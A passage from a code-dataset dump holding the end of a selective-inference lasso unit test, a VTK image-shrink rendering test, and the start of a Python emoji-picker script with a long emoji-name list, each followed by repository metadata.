lagrange = 5. * np.ones(p) * np.sqrt(n)
perturb = np.random.standard_normal(p) * n
LH = lasso.gaussian(X, y, lagrange)
LH.fit(perturb=perturb, solve_args={'min_its':1000})
LQ = modelQ(X.T.dot(X), X, y, lagrange)
LQ.fit(perturb=perturb, solve_args={'min_its':1000})
LQ.summary() # smoke test
conH = LH.sampler.affine_con
conQ = LQ.sampler.affine_con
np.testing.assert_allclose(LH.initial_soln, LQ.initial_soln)
np.testing.assert_allclose(LH.initial_subgrad, LQ.initial_subgrad)
np.testing.assert_allclose(conH.linear_part, conQ.linear_part)
np.testing.assert_allclose(conH.offset, conQ.offset)
np.testing.assert_allclose(LH._beta_full, LQ._beta_full)
|
selective-inference/selective-inference
|
selectinf/randomized/tests/test_modelQ.py
|
Python
|
bsd-3-clause
| 1,147
|
[
"Gaussian"
] |
e2165095504a9f5faf1254cb47397bf4b933111f45b5d8492aa4d603028b8ff4
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestAllShrinks(vtk.test.Testing.vtkTest):
def testAllShrinks(self):
prefix = VTK_DATA_ROOT + "/Data/headsq/quarter"
renWin = vtk.vtkRenderWindow()
# Image pipeline
reader = vtk.vtkImageReader()
reader.SetDataExtent(0, 63, 0, 63, 1, 93)
reader.SetFilePrefix(prefix)
reader.SetDataByteOrderToLittleEndian()
reader.SetDataMask(0x7fff)
factor = 4
magFactor = 8
ops = ["Minimum", "Maximum", "Mean", "Median", "NoOp"]
shrink = dict()
mag = dict()
mapper = dict()
actor = dict()
imager = dict()
for operator in ops:
shrink.update({operator:vtk.vtkImageShrink3D()})
shrink[operator].SetMean(0)
if operator != "NoOp":
                getattr(shrink[operator], operator + 'On')()
shrink[operator].SetShrinkFactors(factor, factor, factor)
shrink[operator].SetInputConnection(reader.GetOutputPort())
mag.update({operator:vtk.vtkImageMagnify()})
mag[operator].SetMagnificationFactors(magFactor, magFactor, magFactor)
mag[operator].InterpolateOff()
mag[operator].SetInputConnection(shrink[operator].GetOutputPort())
mapper.update({operator:vtk.vtkImageMapper()})
mapper[operator].SetInputConnection(mag[operator].GetOutputPort())
mapper[operator].SetColorWindow(2000)
mapper[operator].SetColorLevel(1000)
mapper[operator].SetZSlice(45)
actor.update({operator:vtk.vtkActor2D()})
actor[operator].SetMapper(mapper[operator])
imager.update({operator:vtk.vtkRenderer()})
imager[operator].AddActor2D(actor[operator])
renWin.AddRenderer(imager[operator])
shrink["Minimum"].Update
shrink["Maximum"].Update
shrink["Mean"].Update
shrink["Median"].Update
imager["Minimum"].SetViewport(0, 0, .5, .33)
imager["Maximum"].SetViewport(0, .33, .5, .667)
imager["Mean"].SetViewport(.5, 0, 1, .33)
imager["Median"].SetViewport(.5, .33, 1, .667)
imager["NoOp"].SetViewport(0, .667, 1, 1)
renWin.SetSize(256, 384)
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
        iRen.SetRenderWindow(renWin)
renWin.Render()
img_file = "TestAllShrinks.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(TestAllShrinks, 'test')])
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Imaging/Core/Testing/Python/TestAllShrinks.py
|
Python
|
bsd-3-clause
| 3,535
|
[
"VTK"
] |
f95ebad0ce6d5b41e10d76474f1d0bc219e46f7f42fa1375f572cb9135f22daa
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from subprocess import Popen, PIPE
emojis="""⛑🏻 Helmet With White Cross, Type-1-2
⛑🏼 Helmet With White Cross, Type-3
⛑🏽 Helmet With White Cross, Type-4
⛑🏾 Helmet With White Cross, Type-5
⛑🏿 Helmet With White Cross, Type-6
💏🏻 Kiss, Type-1-2
💏🏼 Kiss, Type-3
💏🏽 Kiss, Type-4
💏🏾 Kiss, Type-5
💏🏿 Kiss, Type-6
💑🏻 Couple With Heart, Type-1-2
💑🏼 Couple With Heart, Type-3
💑🏽 Couple With Heart, Type-4
💑🏾 Couple With Heart, Type-5
💑🏿 Couple With Heart, Type-6
⛷🏻 Skier, Type-1-2
⛷🏼 Skier, Type-3
⛷🏽 Skier, Type-4
⛷🏾 Skier, Type-5
⛷🏿 Skier, Type-6
😀 Grinning Face
😁 Grinning Face With Smiling Eyes
😂 Face With Tears of Joy
🤣 Rolling on the Floor Laughing
😃 Smiling Face With Open Mouth
😄 Smiling Face With Open Mouth & Smiling Eyes
😅 Smiling Face With Open Mouth & Cold Sweat
😆 Smiling Face With Open Mouth & Closed Eyes
😉 Winking Face
😊 Smiling Face With Smiling Eyes
😋 Face Savouring Delicious Food
😎 Smiling Face With Sunglasses
😍 Smiling Face With Heart-Eyes
😘 Face Blowing a Kiss
😗 Kissing Face
😙 Kissing Face With Smiling Eyes
😚 Kissing Face With Closed Eyes
☺ Smiling Face
🙂 Slightly Smiling Face
🤗 Hugging Face
🤩 Star-Struck
🤔 Thinking Face
🤨 Face With Raised Eyebrow
😐 Neutral Face
😑 Expressionless Face
😶 Face Without Mouth
🙄 Face With Rolling Eyes
😏 Smirking Face
😣 Persevering Face
😥 Disappointed but Relieved Face
😮 Face With Open Mouth
🤐 Zipper-Mouth Face
😯 Hushed Face
😪 Sleepy Face
😫 Tired Face
😴 Sleeping Face
😌 Relieved Face
😛 Face With Stuck-Out Tongue
😜 Face With Stuck-Out Tongue & Winking Eye
😝 Face With Stuck-Out Tongue & Closed Eyes
🤤 Drooling Face
😒 Unamused Face
😓 Face With Cold Sweat
😔 Pensive Face
😕 Confused Face
🙃 Upside-Down Face
🤑 Money-Mouth Face
😲 Astonished Face
☹ Frowning Face
🙁 Slightly Frowning Face
😖 Confounded Face
😞 Disappointed Face
😟 Worried Face
😤 Face With Steam From Nose
😢 Crying Face
😭 Loudly Crying Face
😦 Frowning Face With Open Mouth
😧 Anguished Face
😨 Fearful Face
😩 Weary Face
🤯 Exploding Head
😬 Grimacing Face
😰 Face With Open Mouth & Cold Sweat
😱 Face Screaming in Fear
😳 Flushed Face
🤪 Crazy Face
😵 Dizzy Face
😡 Pouting Face
😠 Angry Face
🤬 Face With Symbols Over Mouth
😷 Face With Medical Mask
🤒 Face With Thermometer
🤕 Face With Head-Bandage
🤢 Nauseated Face
🤮 Face Vomiting
🤧 Sneezing Face
😇 Smiling Face With Halo
🤠 Cowboy Hat Face
🤡 Clown Face
🤥 Lying Face
🤫 Shushing Face
🤭 Face With Hand Over Mouth
🧐 Face With Monocle
🤓 Nerd Face
😈 Smiling Face With Horns
👿 Angry Face With Horns
👹 Ogre
👺 Goblin
💀 Skull
☠ Skull and Crossbones
👻 Ghost
👽 Alien
👾 Alien Monster
🤖 Robot Face
💩 Pile of Poo
😺 Smiling Cat Face With Open Mouth
😸 Grinning Cat Face With Smiling Eyes
😹 Cat Face With Tears of Joy
😻 Smiling Cat Face With Heart-Eyes
😼 Cat Face With Wry Smile
😽 Kissing Cat Face With Closed Eyes
🙀 Weary Cat Face
😿 Crying Cat Face
😾 Pouting Cat Face
🙈 See-No-Evil Monkey
🙉 Hear-No-Evil Monkey
🙊 Speak-No-Evil Monkey
👶 Baby
👶🏻 Baby: Light Skin Tone
👶🏼 Baby: Medium-Light Skin Tone
👶🏽 Baby: Medium Skin Tone
👶🏾 Baby: Medium-Dark Skin Tone
👶🏿 Baby: Dark Skin Tone
🧒 Child
🧒🏻 Child: Light Skin Tone
🧒🏼 Child: Medium-Light Skin Tone
🧒🏽 Child: Medium Skin Tone
🧒🏾 Child: Medium-Dark Skin Tone
🧒🏿 Child: Dark Skin Tone
👦 Boy
👦🏻 Boy: Light Skin Tone
👦🏼 Boy: Medium-Light Skin Tone
👦🏽 Boy: Medium Skin Tone
👦🏾 Boy: Medium-Dark Skin Tone
👦🏿 Boy: Dark Skin Tone
👧 Girl
👧🏻 Girl: Light Skin Tone
👧🏼 Girl: Medium-Light Skin Tone
👧🏽 Girl: Medium Skin Tone
👧🏾 Girl: Medium-Dark Skin Tone
👧🏿 Girl: Dark Skin Tone
🧑 Adult
🧑🏻 Adult: Light Skin Tone
🧑🏼 Adult: Medium-Light Skin Tone
🧑🏽 Adult: Medium Skin Tone
🧑🏾 Adult: Medium-Dark Skin Tone
🧑🏿 Adult: Dark Skin Tone
👨 Man
👨🏻 Man: Light Skin Tone
👨🏼 Man: Medium-Light Skin Tone
👨🏽 Man: Medium Skin Tone
👨🏾 Man: Medium-Dark Skin Tone
👨🏿 Man: Dark Skin Tone
👩 Woman
👩🏻 Woman: Light Skin Tone
👩🏼 Woman: Medium-Light Skin Tone
👩🏽 Woman: Medium Skin Tone
👩🏾 Woman: Medium-Dark Skin Tone
👩🏿 Woman: Dark Skin Tone
🧓 Older Adult
🧓🏻 Older Adult: Light Skin Tone
🧓🏼 Older Adult: Medium-Light Skin Tone
🧓🏽 Older Adult: Medium Skin Tone
🧓🏾 Older Adult: Medium-Dark Skin Tone
🧓🏿 Older Adult: Dark Skin Tone
👴 Old Man
👴🏻 Old Man: Light Skin Tone
👴🏼 Old Man: Medium-Light Skin Tone
👴🏽 Old Man: Medium Skin Tone
👴🏾 Old Man: Medium-Dark Skin Tone
👴🏿 Old Man: Dark Skin Tone
👵 Old Woman
👵🏻 Old Woman: Light Skin Tone
👵🏼 Old Woman: Medium-Light Skin Tone
👵🏽 Old Woman: Medium Skin Tone
👵🏾 Old Woman: Medium-Dark Skin Tone
👵🏿 Old Woman: Dark Skin Tone
👨⚕️ Man Health Worker
👨🏻⚕️ Man Health Worker: Light Skin Tone
👨🏼⚕️ Man Health Worker: Medium-Light Skin Tone
👨🏽⚕️ Man Health Worker: Medium Skin Tone
👨🏾⚕️ Man Health Worker: Medium-Dark Skin Tone
👨🏿⚕️ Man Health Worker: Dark Skin Tone
👩⚕️ Woman Health Worker
👩🏻⚕️ Woman Health Worker: Light Skin Tone
👩🏼⚕️ Woman Health Worker: Medium-Light Skin Tone
👩🏽⚕️ Woman Health Worker: Medium Skin Tone
👩🏾⚕️ Woman Health Worker: Medium-Dark Skin Tone
👩🏿⚕️ Woman Health Worker: Dark Skin Tone
👨🎓 Man Student
👨🏻🎓 Man Student: Light Skin Tone
👨🏼🎓 Man Student: Medium-Light Skin Tone
👨🏽🎓 Man Student: Medium Skin Tone
👨🏾🎓 Man Student: Medium-Dark Skin Tone
👨🏿🎓 Man Student: Dark Skin Tone
👩🎓 Woman Student
👩🏻🎓 Woman Student: Light Skin Tone
👩🏼🎓 Woman Student: Medium-Light Skin Tone
👩🏽🎓 Woman Student: Medium Skin Tone
👩🏾🎓 Woman Student: Medium-Dark Skin Tone
👩🏿🎓 Woman Student: Dark Skin Tone
👨🏫 Man Teacher
👨🏻🏫 Man Teacher: Light Skin Tone
👨🏼🏫 Man Teacher: Medium-Light Skin Tone
👨🏽🏫 Man Teacher: Medium Skin Tone
👨🏾🏫 Man Teacher: Medium-Dark Skin Tone
👨🏿🏫 Man Teacher: Dark Skin Tone
👩🏫 Woman Teacher
👩🏻🏫 Woman Teacher: Light Skin Tone
👩🏼🏫 Woman Teacher: Medium-Light Skin Tone
👩🏽🏫 Woman Teacher: Medium Skin Tone
👩🏾🏫 Woman Teacher: Medium-Dark Skin Tone
👩🏿🏫 Woman Teacher: Dark Skin Tone
👨⚖️ Man Judge
👨🏻⚖️ Man Judge: Light Skin Tone
👨🏼⚖️ Man Judge: Medium-Light Skin Tone
👨🏽⚖️ Man Judge: Medium Skin Tone
👨🏾⚖️ Man Judge: Medium-Dark Skin Tone
👨🏿⚖️ Man Judge: Dark Skin Tone
👩⚖️ Woman Judge
👩🏻⚖️ Woman Judge: Light Skin Tone
👩🏼⚖️ Woman Judge: Medium-Light Skin Tone
👩🏽⚖️ Woman Judge: Medium Skin Tone
👩🏾⚖️ Woman Judge: Medium-Dark Skin Tone
👩🏿⚖️ Woman Judge: Dark Skin Tone
👨🌾 Man Farmer
👨🏻🌾 Man Farmer: Light Skin Tone
👨🏼🌾 Man Farmer: Medium-Light Skin Tone
👨🏽🌾 Man Farmer: Medium Skin Tone
👨🏾🌾 Man Farmer: Medium-Dark Skin Tone
👨🏿🌾 Man Farmer: Dark Skin Tone
👩🌾 Woman Farmer
👩🏻🌾 Woman Farmer: Light Skin Tone
👩🏼🌾 Woman Farmer: Medium-Light Skin Tone
👩🏽🌾 Woman Farmer: Medium Skin Tone
👩🏾🌾 Woman Farmer: Medium-Dark Skin Tone
👩🏿🌾 Woman Farmer: Dark Skin Tone
👨🍳 Man Cook
👨🏻🍳 Man Cook: Light Skin Tone
👨🏼🍳 Man Cook: Medium-Light Skin Tone
👨🏽🍳 Man Cook: Medium Skin Tone
👨🏾🍳 Man Cook: Medium-Dark Skin Tone
👨🏿🍳 Man Cook: Dark Skin Tone
👩🍳 Woman Cook
👩🏻🍳 Woman Cook: Light Skin Tone
👩🏼🍳 Woman Cook: Medium-Light Skin Tone
👩🏽🍳 Woman Cook: Medium Skin Tone
👩🏾🍳 Woman Cook: Medium-Dark Skin Tone
👩🏿🍳 Woman Cook: Dark Skin Tone
👨🔧 Man Mechanic
👨🏻🔧 Man Mechanic: Light Skin Tone
👨🏼🔧 Man Mechanic: Medium-Light Skin Tone
👨🏽🔧 Man Mechanic: Medium Skin Tone
👨🏾🔧 Man Mechanic: Medium-Dark Skin Tone
👨🏿🔧 Man Mechanic: Dark Skin Tone
👩🔧 Woman Mechanic
👩🏻🔧 Woman Mechanic: Light Skin Tone
👩🏼🔧 Woman Mechanic: Medium-Light Skin Tone
👩🏽🔧 Woman Mechanic: Medium Skin Tone
👩🏾🔧 Woman Mechanic: Medium-Dark Skin Tone
👩🏿🔧 Woman Mechanic: Dark Skin Tone
👨🏭 Man Factory Worker
👨🏻🏭 Man Factory Worker: Light Skin Tone
👨🏼🏭 Man Factory Worker: Medium-Light Skin Tone
👨🏽🏭 Man Factory Worker: Medium Skin Tone
👨🏾🏭 Man Factory Worker: Medium-Dark Skin Tone
👨🏿🏭 Man Factory Worker: Dark Skin Tone
👩🏭 Woman Factory Worker
👩🏻🏭 Woman Factory Worker: Light Skin Tone
👩🏼🏭 Woman Factory Worker: Medium-Light Skin Tone
👩🏽🏭 Woman Factory Worker: Medium Skin Tone
👩🏾🏭 Woman Factory Worker: Medium-Dark Skin Tone
👩🏿🏭 Woman Factory Worker: Dark Skin Tone
👨💼 Man Office Worker
👨🏻💼 Man Office Worker: Light Skin Tone
👨🏼💼 Man Office Worker: Medium-Light Skin Tone
👨🏽💼 Man Office Worker: Medium Skin Tone
👨🏾💼 Man Office Worker: Medium-Dark Skin Tone
👨🏿💼 Man Office Worker: Dark Skin Tone
👩💼 Woman Office Worker
👩🏻💼 Woman Office Worker: Light Skin Tone
👩🏼💼 Woman Office Worker: Medium-Light Skin Tone
👩🏽💼 Woman Office Worker: Medium Skin Tone
👩🏾💼 Woman Office Worker: Medium-Dark Skin Tone
👩🏿💼 Woman Office Worker: Dark Skin Tone
👨🔬 Man Scientist
👨🏻🔬 Man Scientist: Light Skin Tone
👨🏼🔬 Man Scientist: Medium-Light Skin Tone
👨🏽🔬 Man Scientist: Medium Skin Tone
👨🏾🔬 Man Scientist: Medium-Dark Skin Tone
👨🏿🔬 Man Scientist: Dark Skin Tone
👩🔬 Woman Scientist
👩🏻🔬 Woman Scientist: Light Skin Tone
👩🏼🔬 Woman Scientist: Medium-Light Skin Tone
👩🏽🔬 Woman Scientist: Medium Skin Tone
👩🏾🔬 Woman Scientist: Medium-Dark Skin Tone
👩🏿🔬 Woman Scientist: Dark Skin Tone
👨💻 Man Technologist
👨🏻💻 Man Technologist: Light Skin Tone
👨🏼💻 Man Technologist: Medium-Light Skin Tone
👨🏽💻 Man Technologist: Medium Skin Tone
👨🏾💻 Man Technologist: Medium-Dark Skin Tone
👨🏿💻 Man Technologist: Dark Skin Tone
👩💻 Woman Technologist
👩🏻💻 Woman Technologist: Light Skin Tone
👩🏼💻 Woman Technologist: Medium-Light Skin Tone
👩🏽💻 Woman Technologist: Medium Skin Tone
👩🏾💻 Woman Technologist: Medium-Dark Skin Tone
👩🏿💻 Woman Technologist: Dark Skin Tone
👨🎤 Man Singer
👨🏻🎤 Man Singer: Light Skin Tone
👨🏼🎤 Man Singer: Medium-Light Skin Tone
👨🏽🎤 Man Singer: Medium Skin Tone
👨🏾🎤 Man Singer: Medium-Dark Skin Tone
👨🏿🎤 Man Singer: Dark Skin Tone
👩🎤 Woman Singer
👩🏻🎤 Woman Singer: Light Skin Tone
👩🏼🎤 Woman Singer: Medium-Light Skin Tone
👩🏽🎤 Woman Singer: Medium Skin Tone
👩🏾🎤 Woman Singer: Medium-Dark Skin Tone
👩🏿🎤 Woman Singer: Dark Skin Tone
👨🎨 Man Artist
👨🏻🎨 Man Artist: Light Skin Tone
👨🏼🎨 Man Artist: Medium-Light Skin Tone
👨🏽🎨 Man Artist: Medium Skin Tone
👨🏾🎨 Man Artist: Medium-Dark Skin Tone
👨🏿🎨 Man Artist: Dark Skin Tone
👩🎨 Woman Artist
👩🏻🎨 Woman Artist: Light Skin Tone
👩🏼🎨 Woman Artist: Medium-Light Skin Tone
👩🏽🎨 Woman Artist: Medium Skin Tone
👩🏾🎨 Woman Artist: Medium-Dark Skin Tone
👩🏿🎨 Woman Artist: Dark Skin Tone
👨✈️ Man Pilot
👨🏻✈️ Man Pilot: Light Skin Tone
👨🏼✈️ Man Pilot: Medium-Light Skin Tone
👨🏽✈️ Man Pilot: Medium Skin Tone
👨🏾✈️ Man Pilot: Medium-Dark Skin Tone
👨🏿✈️ Man Pilot: Dark Skin Tone
👩✈️ Woman Pilot
👩🏻✈️ Woman Pilot: Light Skin Tone
👩🏼✈️ Woman Pilot: Medium-Light Skin Tone
👩🏽✈️ Woman Pilot: Medium Skin Tone
👩🏾✈️ Woman Pilot: Medium-Dark Skin Tone
👩🏿✈️ Woman Pilot: Dark Skin Tone
👨🚀 Man Astronaut
👨🏻🚀 Man Astronaut: Light Skin Tone
👨🏼🚀 Man Astronaut: Medium-Light Skin Tone
👨🏽🚀 Man Astronaut: Medium Skin Tone
👨🏾🚀 Man Astronaut: Medium-Dark Skin Tone
👨🏿🚀 Man Astronaut: Dark Skin Tone
👩🚀 Woman Astronaut
👩🏻🚀 Woman Astronaut: Light Skin Tone
👩🏼🚀 Woman Astronaut: Medium-Light Skin Tone
👩🏽🚀 Woman Astronaut: Medium Skin Tone
👩🏾🚀 Woman Astronaut: Medium-Dark Skin Tone
👩🏿🚀 Woman Astronaut: Dark Skin Tone
👨🚒 Man Firefighter
👨🏻🚒 Man Firefighter: Light Skin Tone
👨🏼🚒 Man Firefighter: Medium-Light Skin Tone
👨🏽🚒 Man Firefighter: Medium Skin Tone
👨🏾🚒 Man Firefighter: Medium-Dark Skin Tone
👨🏿🚒 Man Firefighter: Dark Skin Tone
👩🚒 Woman Firefighter
👩🏻🚒 Woman Firefighter: Light Skin Tone
👩🏼🚒 Woman Firefighter: Medium-Light Skin Tone
👩🏽🚒 Woman Firefighter: Medium Skin Tone
👩🏾🚒 Woman Firefighter: Medium-Dark Skin Tone
👩🏿🚒 Woman Firefighter: Dark Skin Tone
👮 Police Officer
👮🏻 Police Officer: Light Skin Tone
👮🏼 Police Officer: Medium-Light Skin Tone
👮🏽 Police Officer: Medium Skin Tone
👮🏾 Police Officer: Medium-Dark Skin Tone
👮🏿 Police Officer: Dark Skin Tone
👮♂️ Man Police Officer
👮🏻♂️ Man Police Officer: Light Skin Tone
👮🏼♂️ Man Police Officer: Medium-Light Skin Tone
👮🏽♂️ Man Police Officer: Medium Skin Tone
👮🏾♂️ Man Police Officer: Medium-Dark Skin Tone
👮🏿♂️ Man Police Officer: Dark Skin Tone
👮♀️ Woman Police Officer
👮🏻♀️ Woman Police Officer: Light Skin Tone
👮🏼♀️ Woman Police Officer: Medium-Light Skin Tone
👮🏽♀️ Woman Police Officer: Medium Skin Tone
👮🏾♀️ Woman Police Officer: Medium-Dark Skin Tone
👮🏿♀️ Woman Police Officer: Dark Skin Tone
🕵 Detective
🕵🏻 Detective: Light Skin Tone
🕵🏼 Detective: Medium-Light Skin Tone
🕵🏽 Detective: Medium Skin Tone
🕵🏾 Detective: Medium-Dark Skin Tone
🕵🏿 Detective: Dark Skin Tone
🕵️♂️ Man Detective
🕵🏻♂️ Man Detective: Light Skin Tone
🕵🏼♂️ Man Detective: Medium-Light Skin Tone
🕵🏽♂️ Man Detective: Medium Skin Tone
🕵🏾♂️ Man Detective: Medium-Dark Skin Tone
🕵🏿♂️ Man Detective: Dark Skin Tone
🕵️♀️ Woman Detective
🕵🏻♀️ Woman Detective: Light Skin Tone
🕵🏼♀️ Woman Detective: Medium-Light Skin Tone
🕵🏽♀️ Woman Detective: Medium Skin Tone
🕵🏾♀️ Woman Detective: Medium-Dark Skin Tone
🕵🏿♀️ Woman Detective: Dark Skin Tone
💂 Guard
💂🏻 Guard: Light Skin Tone
💂🏼 Guard: Medium-Light Skin Tone
💂🏽 Guard: Medium Skin Tone
💂🏾 Guard: Medium-Dark Skin Tone
💂🏿 Guard: Dark Skin Tone
💂♂️ Man Guard
💂🏻♂️ Man Guard: Light Skin Tone
💂🏼♂️ Man Guard: Medium-Light Skin Tone
💂🏽♂️ Man Guard: Medium Skin Tone
💂🏾♂️ Man Guard: Medium-Dark Skin Tone
💂🏿♂️ Man Guard: Dark Skin Tone
💂♀️ Woman Guard
💂🏻♀️ Woman Guard: Light Skin Tone
💂🏼♀️ Woman Guard: Medium-Light Skin Tone
💂🏽♀️ Woman Guard: Medium Skin Tone
💂🏾♀️ Woman Guard: Medium-Dark Skin Tone
💂🏿♀️ Woman Guard: Dark Skin Tone
👷 Construction Worker
👷🏻 Construction Worker: Light Skin Tone
👷🏼 Construction Worker: Medium-Light Skin Tone
👷🏽 Construction Worker: Medium Skin Tone
👷🏾 Construction Worker: Medium-Dark Skin Tone
👷🏿 Construction Worker: Dark Skin Tone
👷♂️ Man Construction Worker
👷🏻♂️ Man Construction Worker: Light Skin Tone
👷🏼♂️ Man Construction Worker: Medium-Light Skin Tone
👷🏽♂️ Man Construction Worker: Medium Skin Tone
👷🏾♂️ Man Construction Worker: Medium-Dark Skin Tone
👷🏿♂️ Man Construction Worker: Dark Skin Tone
👷♀️ Woman Construction Worker
👷🏻♀️ Woman Construction Worker: Light Skin Tone
👷🏼♀️ Woman Construction Worker: Medium-Light Skin Tone
👷🏽♀️ Woman Construction Worker: Medium Skin Tone
👷🏾♀️ Woman Construction Worker: Medium-Dark Skin Tone
👷🏿♀️ Woman Construction Worker: Dark Skin Tone
🤴 Prince
🤴🏻 Prince: Light Skin Tone
🤴🏼 Prince: Medium-Light Skin Tone
🤴🏽 Prince: Medium Skin Tone
🤴🏾 Prince: Medium-Dark Skin Tone
🤴🏿 Prince: Dark Skin Tone
👸 Princess
👸🏻 Princess: Light Skin Tone
👸🏼 Princess: Medium-Light Skin Tone
👸🏽 Princess: Medium Skin Tone
👸🏾 Princess: Medium-Dark Skin Tone
👸🏿 Princess: Dark Skin Tone
👳 Person Wearing Turban
👳🏻 Person Wearing Turban: Light Skin Tone
👳🏼 Person Wearing Turban: Medium-Light Skin Tone
👳🏽 Person Wearing Turban: Medium Skin Tone
👳🏾 Person Wearing Turban: Medium-Dark Skin Tone
👳🏿 Person Wearing Turban: Dark Skin Tone
👳♂️ Man Wearing Turban
👳🏻♂️ Man Wearing Turban: Light Skin Tone
👳🏼♂️ Man Wearing Turban: Medium-Light Skin Tone
👳🏽♂️ Man Wearing Turban: Medium Skin Tone
👳🏾♂️ Man Wearing Turban: Medium-Dark Skin Tone
👳🏿♂️ Man Wearing Turban: Dark Skin Tone
👳♀️ Woman Wearing Turban
👳🏻♀️ Woman Wearing Turban: Light Skin Tone
👳🏼♀️ Woman Wearing Turban: Medium-Light Skin Tone
👳🏽♀️ Woman Wearing Turban: Medium Skin Tone
👳🏾♀️ Woman Wearing Turban: Medium-Dark Skin Tone
👳🏿♀️ Woman Wearing Turban: Dark Skin Tone
👲 Man With Chinese Cap
👲🏻 Man With Chinese Cap: Light Skin Tone
👲🏼 Man With Chinese Cap: Medium-Light Skin Tone
👲🏽 Man With Chinese Cap: Medium Skin Tone
👲🏾 Man With Chinese Cap: Medium-Dark Skin Tone
👲🏿 Man With Chinese Cap: Dark Skin Tone
🧕 Woman With Headscarf
🧕🏻 Woman With Headscarf: Light Skin Tone
🧕🏼 Woman With Headscarf: Medium-Light Skin Tone
🧕🏽 Woman With Headscarf: Medium Skin Tone
🧕🏾 Woman With Headscarf: Medium-Dark Skin Tone
🧕🏿 Woman With Headscarf: Dark Skin Tone
🧔 Bearded Person
🧔🏻 Bearded Person: Light Skin Tone
🧔🏼 Bearded Person: Medium-Light Skin Tone
🧔🏽 Bearded Person: Medium Skin Tone
🧔🏾 Bearded Person: Medium-Dark Skin Tone
🧔🏿 Bearded Person: Dark Skin Tone
👱 Blond-Haired Person
👱🏻 Blond-Haired Person: Light Skin Tone
👱🏼 Blond-Haired Person: Medium-Light Skin Tone
👱🏽 Blond-Haired Person: Medium Skin Tone
👱🏾 Blond-Haired Person: Medium-Dark Skin Tone
👱🏿 Blond-Haired Person: Dark Skin Tone
👱♂️ Blond-Haired Man
👱🏻♂️ Blond-Haired Man: Light Skin Tone
👱🏼♂️ Blond-Haired Man: Medium-Light Skin Tone
👱🏽♂️ Blond-Haired Man: Medium Skin Tone
👱🏾♂️ Blond-Haired Man: Medium-Dark Skin Tone
👱🏿♂️ Blond-Haired Man: Dark Skin Tone
👱♀️ Blond-Haired Woman
👱🏻♀️ Blond-Haired Woman: Light Skin Tone
👱🏼♀️ Blond-Haired Woman: Medium-Light Skin Tone
👱🏽♀️ Blond-Haired Woman: Medium Skin Tone
👱🏾♀️ Blond-Haired Woman: Medium-Dark Skin Tone
👱🏿♀️ Blond-Haired Woman: Dark Skin Tone
🤵 Man in Tuxedo
🤵🏻 Man in Tuxedo: Light Skin Tone
🤵🏼 Man in Tuxedo: Medium-Light Skin Tone
🤵🏽 Man in Tuxedo: Medium Skin Tone
🤵🏾 Man in Tuxedo: Medium-Dark Skin Tone
🤵🏿 Man in Tuxedo: Dark Skin Tone
👰 Bride With Veil
👰🏻 Bride With Veil: Light Skin Tone
👰🏼 Bride With Veil: Medium-Light Skin Tone
👰🏽 Bride With Veil: Medium Skin Tone
👰🏾 Bride With Veil: Medium-Dark Skin Tone
👰🏿 Bride With Veil: Dark Skin Tone
🤰 Pregnant Woman
🤰🏻 Pregnant Woman: Light Skin Tone
🤰🏼 Pregnant Woman: Medium-Light Skin Tone
🤰🏽 Pregnant Woman: Medium Skin Tone
🤰🏾 Pregnant Woman: Medium-Dark Skin Tone
🤰🏿 Pregnant Woman: Dark Skin Tone
🤱 Breast-Feeding
🤱🏻 Breast-Feeding: Light Skin Tone
🤱🏼 Breast-Feeding: Medium-Light Skin Tone
🤱🏽 Breast-Feeding: Medium Skin Tone
🤱🏾 Breast-Feeding: Medium-Dark Skin Tone
🤱🏿 Breast-Feeding: Dark Skin Tone
👼 Baby Angel
👼🏻 Baby Angel: Light Skin Tone
👼🏼 Baby Angel: Medium-Light Skin Tone
👼🏽 Baby Angel: Medium Skin Tone
👼🏾 Baby Angel: Medium-Dark Skin Tone
👼🏿 Baby Angel: Dark Skin Tone
🎅 Santa Claus
🎅🏻 Santa Claus: Light Skin Tone
🎅🏼 Santa Claus: Medium-Light Skin Tone
🎅🏽 Santa Claus: Medium Skin Tone
🎅🏾 Santa Claus: Medium-Dark Skin Tone
🎅🏿 Santa Claus: Dark Skin Tone
🤶 Mrs. Claus
🤶🏻 Mrs. Claus: Light Skin Tone
🤶🏼 Mrs. Claus: Medium-Light Skin Tone
🤶🏽 Mrs. Claus: Medium Skin Tone
🤶🏾 Mrs. Claus: Medium-Dark Skin Tone
🤶🏿 Mrs. Claus: Dark Skin Tone
🧙 Mage
🧙🏻 Mage: Light Skin Tone
🧙🏼 Mage: Medium-Light Skin Tone
🧙🏽 Mage: Medium Skin Tone
🧙🏾 Mage: Medium-Dark Skin Tone
🧙🏿 Mage: Dark Skin Tone
🧙♀️ Woman Mage
🧙🏻♀️ Woman Mage: Light Skin Tone
🧙🏼♀️ Woman Mage: Medium-Light Skin Tone
🧙🏽♀️ Woman Mage: Medium Skin Tone
🧙🏾♀️ Woman Mage: Medium-Dark Skin Tone
🧙🏿♀️ Woman Mage: Dark Skin Tone
🧙♂️ Man Mage
🧙🏻♂️ Man Mage: Light Skin Tone
🧙🏼♂️ Man Mage: Medium-Light Skin Tone
🧙🏽♂️ Man Mage: Medium Skin Tone
🧙🏾♂️ Man Mage: Medium-Dark Skin Tone
🧙🏿♂️ Man Mage: Dark Skin Tone
🧚 Fairy
🧚🏻 Fairy: Light Skin Tone
🧚🏼 Fairy: Medium-Light Skin Tone
🧚🏽 Fairy: Medium Skin Tone
🧚🏾 Fairy: Medium-Dark Skin Tone
🧚🏿 Fairy: Dark Skin Tone
🧚♀️ Woman Fairy
🧚🏻♀️ Woman Fairy: Light Skin Tone
🧚🏼♀️ Woman Fairy: Medium-Light Skin Tone
🧚🏽♀️ Woman Fairy: Medium Skin Tone
